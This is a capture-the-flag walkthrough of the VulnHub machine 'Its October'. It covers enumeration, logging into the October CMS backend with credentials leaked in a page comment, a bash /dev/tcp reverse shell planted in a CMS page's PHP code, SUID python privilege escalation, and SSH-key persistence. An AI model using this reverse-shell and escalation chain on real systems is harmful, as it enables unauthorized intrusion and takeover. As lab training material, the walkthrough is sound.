Its October walkthrough
Greetings, hacker-world! 👽 …Here i am again with this amazing box of vulnhub , Its october. Get this box from following links:
https://www.infosecwarrior.com/its-october/
This machine has got something unique as it teaches you how you can exploit a cms even if you can’t find any known vulnerability. Without any further ado, lets get started:
Methodology applied :
Host discovery
- netdiscover
Enumeration
- nmap
- nikto
- gobuster
Exploit the web
- placing our reverse shell (this is an important step!)
Privilege escalation
- abusing SETUID
Let the hacking begin..
→Host discovery
To get the IP of the machine, i used netdiscover. As i alloted host-only adapter to my machine, so my interface would be vboxnet0.
─[✗]─[root@machine]─[~/mine/october]
└──╼ #netdiscover -i vboxnet0
We see that our machine has an IP 192.168.56.33
→Enumeration
First we scan the machine for services. For this we use nmap’s aggressive scan:
┌─[✗]─[root@machine]─[~/mine/october]
└──╼ #nmap -sV -A -p- -v 192.168.56.33
We see that port 80 and 8080 are open, so without any second thought we try to open it on browser.
Its just a normal website. We dont know the CMS yet, and also we dont get anything useful in page-source. But okay, lets move ahead.
This is also a simple web page. Lets check its page-source.
We see link pointing to an image, and is being commented. Lets try to open it up.
Well here we see some credentials, of which we don’t know the use yet, but will certainly be used later on. Lets just not ignore it.
Now we use nikto for further enumeration of web:
┌─[✗]─[root@machine]─[~/mine/october]
└──╼ #nikto -h http://192.168.56.33/
We see nothing worth paying attention at. Now use gobuster for directory bruteforcing.
┌─[root@machine]─[~/mine/october]
└──╼ #gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.56.33/
On directory bruteforcing, we get some directories but watch carefully they all have a status code 301, which indicates redirection, while only one directory /backend shows the code 302, lets try it.
we see, we get redirected to a login page. On a bit of google search, i realized its a CMS named as October cms.This is the time, we remember that we got credentials a few moments back. Lets try those here:
And…we get in! First checkpoint arrived, you can say!
→ Exploit the web (placing the shell)
IMPORTANT NOTE: now uploading reverse shell in this CMS is a bit different from that in wordpress and drupal. When we try to get exploits for this october, we get exploits, what i think, are all patched in the version we are using. Those exploits were for build 412 and we have build 465. So none of them works here. Now you try to upload a .php file, but you can’t as that file extension is blocked. After a lot of reading, finally i came to the solution, which says, we can run php script here but that should be in a function only.
Lets see how:
open the cms tab on dashboard > click on +ADD :
We have a new page here. Give it a name of your choice. At the bottom side we see two sections markup and code.
Here’s what we have to do :
- Markup : any html code, this is for the view (i copied the code from homepage’s markup)
- code : tiny php reverse shell
--> exec("/bin/bash -c 'bash -i > /dev/tcp/192.168.56.1/1234 0>&1'");KEEP IN MIND: this code must be put in a function of php , as shown :
Save it!
now on your local machine start the listener and call the page on web.
Congrats, second checkpoint arrived!
Now we try to yield an interactive shell out of the dumb-shell we have. But this box doesn’t have python installed, as we get nothing on the following command:
after wandering through the directories, we get nothing but a local user named armour. Then we check for suid :
We see it has python3.7 installed. Now generate a interactive shell using python3.7 .
→Privilege escalation
Now for privilege escalation we create our exploit, using python3.7:
you can also see the exploit on following link:
https://gtfobins.github.io/gtfobins/python/Run the exploit, using python3.7:
BOOM!! 🔥🔥🔥 we have the flag and euid of root!!
But our work doesn’t meet its end here, we have to generate a proper shell, a little brain and you have it too!
use scp to transport your ssh public keys and append it to authorized_keys .
Following screenshot explains the next few steps , all in one:
OK! Now you can properly owned the BOX with all the powers. 🌟
Remember one thing, hacking is all about being creative and be a little logical. Hope you enjoyed rooting this box.
HAPPY HACKING, fellas!
- ❤️
